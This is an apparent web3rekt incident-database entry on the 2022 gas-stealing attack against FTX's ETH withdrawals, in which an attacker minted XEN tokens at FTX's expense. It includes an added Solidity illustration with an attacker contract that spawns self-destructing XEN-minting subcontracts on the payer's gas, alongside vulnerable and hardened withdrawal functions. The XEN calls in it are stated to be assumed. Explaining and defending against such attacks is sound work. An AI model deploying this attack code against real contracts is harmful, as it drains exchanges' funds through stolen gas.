
ID: ftx-1213
Date: October 13, 2022
Status: Verified
Incident Count: 4

REKT

Contributor: web3rekt.com

KYC: None
Audits: None

Loss Amount: 100,845
Recovered: -
Rewards:
Ticker: USD, ETH

Key Indicators

Platform: Ethereum
Type: Exchange
Category: Assets
Method: Contract Vulnerabilities
Data Sources:

Extended Method: No restriction on the withdrawal recipient being a contract address, and no cap on the gas forwarded with ETH withdrawal transfers


Days in Operation: 1350 (3.70 Years)

Beosin reported that FTX was under a gas-stealing attack in which the attacker minted XEN tokens at FTX's expense.

The attacker deploys an "arbitrage" contract and initiates an ETH withdrawal from FTX to that contract. Because the sender of the withdrawal transaction is the FTX hot wallet, FTX pays the gas for everything that executes during the transfer. FTX neither restricts withdrawal recipients to externally owned accounts (a contract address is accepted) nor caps the gas forwarded with the ETH transfer, so the recipient contract's fallback function receives enough gas to do arbitrary work. When the FTX hot wallet transfers a small amount of ETH to the attack contract, its fallback function creates subcontracts in batches; each subcontract's fallback() sends a mint request to the XEN contract to claim XEN and then self-destructs, and the process repeats on every withdrawal.
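The mechanism above, reduced to a minimal Solidity illustration of both the attacker's side and the exchange's withdrawal path. This is an added example, not Beosin's writeup, the attacker's contracts or FTX's hot-wallet code: the `IXEN` interface, `claimRank`, the `term` value, `HotWallet`, `withdrawUnsafe` and `withdrawSafe` are all assumed names, and the XEN call is a stand-in for whatever claim/mint function the attacker actually invoked.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

// ASSUMPTION: a minimal stand-in for the XEN mint entry point. The real
// XEN function names and parameters are not given on this page.
interface IXEN {
    function claimRank(uint256 term) external;
}

// Disposable subcontract. It exists only to be a fresh address that can
// submit a XEN claim; it then self-destructs, as the writeup describes.
contract Minter {
    constructor(IXEN xen, uint256 term) {
        xen.claimRank(term);
        selfdestruct(payable(msg.sender));
    }
}

// The attacker's "arbitrage" contract, registered as the withdrawal address.
// Whatever runs inside receive() executes within the exchange's withdrawal
// transaction, so the exchange pays the gas.
contract GasThief {
    IXEN public immutable xen;
    uint256 public constant TERM = 1; // assumed claim term

    constructor(IXEN _xen) {
        xen = _xen;
    }

    receive() external payable {
        // Keep spawning minters until the forwarded gas is nearly used up.
        // Each is a new address, so per-address claim limits on the XEN
        // side do not stop the loop (assumption about XEN, stated above).
        while (gasleft() > 150_000) {
            new Minter(xen, TERM);
        }
    }
}

// HYPOTHETICAL exchange hot wallet, not FTX's code. withdrawUnsafe models
// the behaviour Beosin described; withdrawSafe closes both gaps.
contract HotWallet {
    address public immutable operator;

    constructor() {
        operator = msg.sender;
    }

    receive() external payable {}

    // Vulnerable: any address accepted and all remaining gas forwarded, so
    // the recipient's receive()/fallback() can run GasThief's loop on the
    // exchange's gas.
    function withdrawUnsafe(address payable to, uint256 amount) external {
        require(msg.sender == operator, "not operator");
        (bool ok, ) = to.call{value: amount}("");
        require(ok, "transfer failed");
    }

    // Hardened: refuse contract recipients and forward only the 2300-gas
    // stipend, which is enough to receive ETH but not to create contracts
    // or make further external calls.
    function withdrawSafe(address payable to, uint256 amount) external {
        require(msg.sender == operator, "not operator");
        require(to.code.length == 0, "recipient must be an EOA");
        (bool ok, ) = to.call{value: amount, gas: 2300}("");
        require(ok, "transfer failed");
    }
}
```

The gas cap is the load-bearing control: `to.code.length == 0` alone can be sidestepped by an address that is still under construction or by a CREATE2 address funded before deployment, but with only the 2300-gas stipend the recipient cannot deploy subcontracts or call XEN no matter what code it holds. The same limit should be enforced off-chain in the hot-wallet signer (a fixed per-withdrawal gas limit), so that a bug in the contract path cannot reopen it.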

As of this writing, FTX has lost a total of 81+ ETH to the gas-theft vulnerability. The attacker's address has acquired over 100 million XEN tokens and exchanged some of them for 61 ETH through decentralized exchanges such as DODO and Uniswap, depositing the proceeds to FTX and Binance.


DISCLAIMER: While web3rekt has used its best efforts in aggregating and maintaining this database, this website makes no representations or warranties with respect to the accuracy or completeness of the information and data herein, and specifically disclaims any implied warranties of merchantability or fitness for any particular purpose.

Under no circumstances, shall web3rekt be liable for any loss of profit or funds, any regulatory or governmental penalties, any legal costs, or any other commercial and non-commercial damages, including but not limited to special, incidental, consequential, or other damages from any or all usage of the data and information derived from this database.